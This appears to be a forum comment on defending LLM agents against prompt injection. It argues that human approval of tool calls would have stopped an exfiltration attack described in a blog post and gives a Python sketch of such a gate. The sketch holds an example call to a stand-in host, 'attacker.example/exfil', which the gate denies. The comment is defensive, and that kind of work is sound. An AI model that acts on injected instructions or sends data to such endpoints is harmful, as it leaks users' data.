The same thing would work for LLMs: the attack in the blog post above would easily break if the agent required approval before curling the Anthropic endpoint.
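A minimal sketch of what that approval gate could look like. All names here (`ToolCall`, `run_tool`, the `approve` callback) are hypothetical, not any real agent framework's API; the point is only that the model's requested action passes through a human decision before anything executes.

```python
# Hypothetical approval gate: a model-requested tool call only runs if a
# human operator approves it, so an injected instruction cannot exfiltrate
# data on its own. Illustrative names, not a real API.
from dataclasses import dataclass
from typing import Callable

@dataclass
class ToolCall:
    name: str       # e.g. "curl"
    argument: str   # e.g. the URL the model wants to fetch

def run_tool(call: ToolCall, approve: Callable[[ToolCall], bool]) -> str:
    """Execute a model-requested tool call only if a human approves it."""
    if not approve(call):
        return f"denied: {call.name} {call.argument}"
    # A real agent would invoke the tool here; stubbed out for the sketch.
    return f"executed: {call.name} {call.argument}"

# An injected prompt asking the agent to curl an attacker-chosen endpoint
# goes nowhere unless the operator explicitly approves that specific call.
injected = ToolCall("curl", "https://attacker.example/exfil")
result = run_tool(injected, approve=lambda call: False)  # operator says no
```

The gate doesn't stop the injection itself, only its effect: the model can still be talked into *wanting* to make the call, but the call never leaves the sandbox without sign-off.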
Prompt injection is possible because input is interpreted as prompt. A real protection would have to make it possible to interpret input as not-prompt, unconditionally, regardless of its content. Current LLMs don't have that capability: to them, absolutely everything is a prompt.